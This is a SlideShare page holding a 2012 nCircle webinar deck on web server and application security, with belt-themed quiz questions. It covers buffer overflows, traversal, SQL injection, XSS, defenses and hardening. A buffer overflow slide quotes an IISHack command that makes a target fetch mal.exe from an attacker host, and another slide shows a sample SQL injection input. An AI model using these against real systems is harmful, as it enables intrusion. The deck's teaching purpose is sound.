Get Your Black Belt in                                       Web Application Security                                     ...
Web Server and Web                                           Applications Security2   © 2012 nCircle. All rights reserved.
Why Web Servers and Web Applications are hard    to Defend    Why is attacking a web server or web applications one of    ...
Typical Attack Steps against a Web    Server    1.          Reconnaissance (passive)    2.          Scanning and enumerati...
Two Methods of Attack: The Web Server    and Web Applications    • Web Server Attacks      – Vulnerabilities in the web se...
Ichi (one)    With respect to defending against web attacks what is      problem with port 80 with respect to security?   ...
Ni (two)    For an attack to work on a web server or a web application      what does it need to have?               a.   ...
Congratulations on your new Yellow Belt!    You have attained the WebApp rank of 7th Kyu.8   © 2012 nCircle. All rights re...
Web Server Attacks9   © 2012 nCircle. All rights reserved.
Buffer Overflow Attack     A buffer overflow attack allows an attacker to overwrite     code in the program‟s execution pa...
Web Server File System Traversal Attacks     • Clients are permitted access to only a specific partition of       the serv...
San (three)     Which one of the following is NOT one of the typical attacks      used against a web server like Apache?  ...
Shi (four)     A web server attack that involves a hacker gaining access       to restricted areas and files on a web serv...
Congratulations on your new Blue Belt!     You have attained the WebApp rank of 4th Kyu.14   © 2012 nCircle. All rights re...
Web Application Attacks15   © 2012 nCircle. All rights reserved.
OWASP Top 10 (2010 List) – www.owasp.org                       OWASP Top 10 Categories                       A1-Injection ...
Injection (Command Injection – OWASP A1)     • Occurs when untrusted data is sent to a command       interpreter as part o...
SQL Injection (Valid Data)     As an example the user enters Jill and Brown into two input     fields on a web page     Th...
SQL Injection (Invalid Data)     The user enters Jane and Doe‟ OR „1‟=„1 on the web page     The program takes this input ...
Defenses Against SQL Injection     •       Prepared Statements (parameterized queries)     •       Stored Procedures     •...
Cross Site Scripting (XSS – OWASP A2)     • Cross-Site Scripting attacks are a type of injection       attack, in which ma...
Defenses Against XSS     Primary defense: Escaping untrusted data     “Escaping” is a technique used to ensure that charac...
Broken Authentication and Session Management     (OWASP A3)     • Web Application functions related to authentication     ...
Defenses Against Broken Authentication and     Session Management     • Secure management of session identifiers          ...
Go (five)     An web application attack that focuses on the database       application of a web server and enables a hacke...
Roku (six)     What is one of the defenses against SQL Injection?                a.         Least Privilege               ...
Congratulations on your new advanced     Blue Belt rank! You have attained the     WebApp rank of 2nd Kyu.27   © 2012 nCir...
Web Server and Web Application                          Defense Tools28   © 2012 nCircle. All rights reserved.
Web Server and Application Defense Tools (1 of 2)     • Scanning and mapping tools                • Ping, Nping, Nmap, Ama...
Web Server and Application Defense Tools (2 of 2)     • Password cracking tools                • John the Ripper, Cain and...
Network Defense Tools (Protecting the Web     Server)     • Routers     • Firewalls (network layer)     • Web Application ...
Web Server Protection     • Protect the Web Server     • Vulnerability Assessment     • Harden the Web Server             ...
Place the Web Sever in an Untrusted Zone33   © 2012 nCircle. All rights reserved.
Security Harden the Web Server (1 of 2)     • Use Security Hardening Guides (Vendor       documentation, OWASP, SANS, NIST...
Security Harden the Web Server (2 of 2)     • Authentication and Access Control                – File and directory permis...
Web Server Attack Countermeasures     • Buffer Overflow        – Can be mitigated by conducting frequent scans for server ...
Shichi (seven)     Tools such as Nmap and Amap are used primarily for       which one of the following Web attack steps?  ...
Hachi (eight)     What is a good tool to help harden an IIS web server?      (choose the best answer)                a.   ...
Congratulations on your new Black Belt!     You have attained the WebApp rank of 1st Dan39   © 2012 nCircle. All rights re...
Resources     • OWASP (Open Web Application Security Project)       www.owasp.org     • NIST (National Institute of Standa...
Questions?41   © 2012 nCircle. All rights reserved.
Upcoming SlideShare
Loading in...5
×

nCircle Webinar: Get your Black Belt

4,723

Published on

Get Your Black Belt in Web Application Security

Published in: Business, Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
4,723
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
9
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

nCircle Webinar: Get your Black Belt

  1. 1. Get Your Black Belt in Web Application Security 26 April 2012© 2012 nCircle. All rights reserved.
  2. 2. Web Server and Web Applications Security2 © 2012 nCircle. All rights reserved.
  3. 3. Why Web Servers and Web Applications are hard to Defend Why is attacking a web server or web applications one of the easiest attack methods? – On the perimeter – Accessible by anyone on the Internet – Need to balance functionality with security – Port 80 and port 443 (can‟t just block them) – Lack of security awareness of many web developers – High level of traffic. Hard to distinguish an attack from high volumes of legitimate traffic3 © 2012 nCircle. All rights reserved.
  4. 4. Typical Attack Steps against a Web Server 1. Reconnaissance (passive) 2. Scanning and enumeration (active) 3. Gaining Access (exploit) 4. Escalation of privilege 5. Maintain access 6. Covering tracks and placing backdoors4 © 2012 nCircle. All rights reserved.
  5. 5. Two Methods of Attack: The Web Server and Web Applications • Web Server Attacks – Vulnerabilities in the web server or web server configuration • Examples: Buffer Overflows, Traversals • Web Application Attacks – Vulnerabilities in web applications • Command Injection • XSS (Cross Site Scripting)5 © 2012 nCircle. All rights reserved.
  6. 6. Ichi (one) With respect to defending against web attacks what is problem with port 80 with respect to security? a. It is the default TFTP port b. It can be closed c. It is not a well-known port d. It can‟t be blocked Difficulty: Easy/Medium6 © 2012 nCircle. All rights reserved.
  7. 7. Ni (two) For an attack to work on a web server or a web application what does it need to have? a. An exploit b. A risk c. A vulnerability d. A configuration Difficulty: Easy/Medium7 © 2012 nCircle. All rights reserved.
  8. 8. Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu.8 © 2012 nCircle. All rights reserved.
  9. 9. Web Server Attacks9 © 2012 nCircle. All rights reserved.
  10. 10. Buffer Overflow Attack A buffer overflow attack allows an attacker to overwrite code in the program‟s execution path and thus take control of the program to execute the attacker‟s code. Cause: Poor boundary checking (checking whether a variable is within some bounds before its use) Example: IISHack.exe  Exploits the IIS http daemon buffer. Below is a sample: c: iishack www.WebserverA.com 80 www.hackserver.com/mal.exe10 © 2012 nCircle. All rights reserved.
  11. 11. Web Server File System Traversal Attacks • Clients are permitted access to only a specific partition of the server file system, known as the web document root directory. • By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server. • Attack is initiated by inserting special characters in URLs, for example, ../ sequence. • Encoding can be used to bypass Web server filtering.11 © 2012 nCircle. All rights reserved.
  12. 12. San (three) Which one of the following is NOT one of the typical attacks used against a web server like Apache? a. ARP poisoning b. Buffer overflow c. Source disclosure d. File system traversal Difficulty: Easy/Medium12 © 2012 nCircle. All rights reserved.
  13. 13. Shi (four) A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack? a. Buffer boundary b. File system traversal c. Encryption d. File overflow Difficulty: Easy/Medium13 © 2012 nCircle. All rights reserved.
  14. 14. Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu.14 © 2012 nCircle. All rights reserved.
  15. 15. Web Application Attacks15 © 2012 nCircle. All rights reserved.
  16. 16. OWASP Top 10 (2010 List) – www.owasp.org OWASP Top 10 Categories A1-Injection A2-Cross Site Scripting (XSS) A3-Broken Authentication/Session Management A4-Insecure Direct Object References A5-Cross Site Request Forgery (CSRF) A6-Security Misconfiguration A7-Insecure Cryptographic Storage A8-Failure to Restrict URL Access A9-Insufficient Transport Layer Encryption A10-Unvalidated Redirects and Forwards16 © 2012 nCircle. All rights reserved.
  17. 17. Injection (Command Injection – OWASP A1) • Occurs when untrusted data is sent to a command interpreter as part of a command or query. • Cleverly formed data can trick the command interpreter to performing unintended commands or revealing unintended information • Examples of command injection: – SQL Injection – Script Injection – Any web application that accepts input is potentially vulnerable to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program17 © 2012 nCircle. All rights reserved.
  18. 18. SQL Injection (Valid Data) As an example the user enters Jill and Brown into two input fields on a web page The program takes this input into the CustID variable and dynamically creates the query string : „SELECT * FROM accounts WHERE customerID = Jill_Brown‟ The program then sends this SQL query to the SQL database and the SQL database then retrieves and displays Jill Brown‟s record as expected.18 © 2012 nCircle. All rights reserved.
  19. 19. SQL Injection (Invalid Data) The user enters Jane and Doe‟ OR „1‟=„1 on the web page The program takes this input and dynamically creates the query string : „SELECT * FROM accounts WHERE customerID = Jane_Doe‟ OR „1‟=„1‟ The program send this SQL query to the SQL database and it then retrieves ALL of the records in the database accounts table – NOT as expected 19 © 2012 nCircle. All rights reserved.
  20. 20. Defenses Against SQL Injection • Prepared Statements (parameterized queries) • Stored Procedures • Escaping all user supplied input • Least privilege • White list input validation Reference: OWASP SQL Injection Prevention Cheat Sheet (www.owasp.org)20 © 2012 nCircle. All rights reserved.
  21. 21. Cross Site Scripting (XSS – OWASP A2) • Cross-Site Scripting attacks are a type of injection attack, in which malicious scripts are injected into the otherwise benign and trusted web sites. Injection occurs usually by inserting untrusted data in a user‟s browser via a web page request. Untrusted data21 © 2012 nCircle. All rights reserved.
  22. 22. Defenses Against XSS Primary defense: Escaping untrusted data “Escaping” is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreters parser. Rule #0 : Never put untrusted data (in a web page) Except in Allowed Locations Rule #1 : HTML Escape Before Inserting Untrusted Data Except into HTML Element Content Rules #2 - #7 : These rules deal with exceptions if you put untrusted data in “Unallowed” locations Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)22 © 2012 nCircle. All rights reserved.
  23. 23. Broken Authentication and Session Management (OWASP A3) • Web Application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented allowing an attacker to assume someone elses identity.23 © 2012 nCircle. All rights reserved.
  24. 24. Defenses Against Broken Authentication and Session Management • Secure management of session identifiers – Do not put session identifiers in the URL – Session IDs should have a timeout feature • Do not allow the login process to execute from an unencrypted page • Password Change Controls • Password use / strength / storage • Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)24 © 2012 nCircle. All rights reserved.
  25. 25. Go (five) An web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following? a. Sequence infiltration b. SQL injection c. Cookie poisoning d. Hidden parameter exploit Difficulty: Easy/Medium25 © 2012 nCircle. All rights reserved.
  26. 26. Roku (six) What is one of the defenses against SQL Injection? a. Least Privilege b. Black list input validation c. Sanitization d. Proxy manipulation Difficulty: Easy/Medium26 © 2012 nCircle. All rights reserved.
  27. 27. Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.27 © 2012 nCircle. All rights reserved.
  28. 28. Web Server and Web Application Defense Tools28 © 2012 nCircle. All rights reserved.
  29. 29. Web Server and Application Defense Tools (1 of 2) • Scanning and mapping tools • Ping, Nping, Nmap, Amap, SuperScan, … • Vulnerability and Web vulnerability scanners • Nikto, Wikto, Nessus, w3af, IP360, WebInspect, Sentinel, WebApp360, Cenzic, Fortify, … • Web proxy tools • WebScarab, Paros Proxy, Burp Proxy, … • Web mapping/ripping tools • Black Widow, Wget, skipfish, … • Communication/data transfer tools • Ncat, telnet, ftp, …. • Exploits, Exploit Kits, and Exploit Frameworks • Program for a specific exploit • Pen Test frameworks: Metasploit, Core Impact, CANVAS29 © 2012 nCircle. All rights reserved.
  30. 30. Web Server and Application Defense Tools (2 of 2) • Password cracking tools • John the Ripper, Cain and Abel, PRTK, ophcrack, … • Web Source Code examination tools: • Instant Source, Firebug, …. • SQL Injection Tools • BSQL Hacker, The Mole, sqlmap, Pangolin, …30 © 2012 nCircle. All rights reserved.
  31. 31. Network Defense Tools (Protecting the Web Server) • Routers • Firewalls (network layer) • Web Application Firewalls (application layer) • Web Application Proxies • Honeypots/Honeynets • Logging • Intrusion Detection/Prevention System (IDS/IPS) • Host-based Intrusion Detection (HIDS), e.g. file integrity detection • Backups • Computer Forensic Tools31 © 2012 nCircle. All rights reserved.
  32. 32. Web Server Protection • Protect the Web Server • Vulnerability Assessment • Harden the Web Server – Host (OS) – Web Server – Web Services • Logging • Backups and recovery32 © 2012 nCircle. All rights reserved.
  33. 33. Place the Web Sever in an Untrusted Zone33 © 2012 nCircle. All rights reserved.
  34. 34. Security Harden the Web Server (1 of 2) • Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC) • Host (OS) hardening • Web Server hardening – Use tools like IIS Lockdown and URLscan – Harden each service you offer on your Web Server – Disable / remove anything you don‟t use or need: accounts, ports, services, accounts, plug-ins – Configuration settings – Permissions34 © 2012 nCircle. All rights reserved.
  35. 35. Security Harden the Web Server (2 of 2) • Authentication and Access Control – File and directory permissions – Account password and lockout policies • Logging and Audit Policies • Vulnerability and Compliance Assessments – Vulnerability scanner – Web application vulnerability scanner – Configuration scanner – Audits for compliance assessments – Penetration testing / manual testing35 © 2012 nCircle. All rights reserved.
  36. 36. Web Server Attack Countermeasures • Buffer Overflow – Can be mitigated by conducting frequent scans for server vulnerabilities – Prompting acquiring and installing patches and service packs – Implementing effective firewalls – Applying web configuration lockdown utilities • File System Traversal – Promptly apply patches and updates to the web server – Restrict privileges to executable programs such as cmd.exe – Set file and directory permissions – Locate the system software on a different disk drive from the web site software and content directory.36 © 2012 nCircle. All rights reserved.
  37. 37. Shichi (seven) Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps? a. Banner grabbing b. Defeating authentication c. Scanning d. Password Cracking Difficulty: Medium/Hard37 © 2012 nCircle. All rights reserved.
  38. 38. Hachi (eight) What is a good tool to help harden an IIS web server? (choose the best answer) a. Cain and Abel b. URLscan c. ncat d. WebScarab Difficulty: Medium/Hard38 © 2012 nCircle. All rights reserved.
  39. 39. Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan39 © 2012 nCircle. All rights reserved.
  40. 40. Resources • OWASP (Open Web Application Security Project) www.owasp.org • NIST (National Institute of Standards and Technology) www.nist.gov • SANS www.sans.org • Web Application Security Consortium (WASC) www.webappsec.org • SecTools.org http://sectools.org40 © 2012 nCircle. All rights reserved.
  41. 41. Questions?41 © 2012 nCircle. All rights reserved.
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×